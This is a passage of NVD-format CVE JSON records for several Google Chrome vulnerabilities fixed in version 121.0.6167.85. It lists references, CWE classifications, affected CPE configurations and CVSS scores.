Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-05-22T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0805", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1514925", "name" : "https://crbug.com/1514925", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1514925", "name" : "https://crbug.com/1514925", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-06-20T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0806", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1505176", "name" : "https://crbug.com/1505176", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1505176", "name" : "https://crbug.com/1505176", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Use after free in Passwords in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-06-20T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0807", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1505080", "name" : "https://crbug.com/1505080", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1505080", "name" : "https://crbug.com/1505080", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Use after free in Web Audio in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-06-20T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0808", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-191" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1504936", "name" : "https://crbug.com/1504936", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1504936", "name" : "https://crbug.com/1504936", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-05-30T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0809", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1497985", "name" : "https://crbug.com/1497985", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1497985", "name" : "https://crbug.com/1497985", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-05-15T15:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0810", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1496250", "name" : "https://crbug.com/1496250", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1496250", "name" : "https://crbug.com/1496250", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Insufficient policy enforcement in DevTools in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-05-22T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0811", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "http://packetstormsecurity.com/files/177172/Chrome-chrome.pageCapture.saveAsMHTML-Extension-API-Blocked-Origin-Bypass.html", "name" : "http://packetstormsecurity.com/files/177172/Chrome-chrome.pageCapture.saveAsMHTML-Extension-API-Blocked-Origin-Bypass.html", "refsource" : "", "tags" : [ ] }, { "url" : "http://packetstormsecurity.com/files/177172/Chrome-chrome.pageCapture.saveAsMHTML-Extension-API-Blocked-Origin-Bypass.html", "name" : "http://packetstormsecurity.com/files/177172/Chrome-chrome.pageCapture.saveAsMHTML-Extension-API-Blocked-Origin-Bypass.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1494490", "name" : "https://crbug.com/1494490", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1494490", "name" : "https://crbug.com/1494490", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Inappropriate implementation in Extensions API in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ 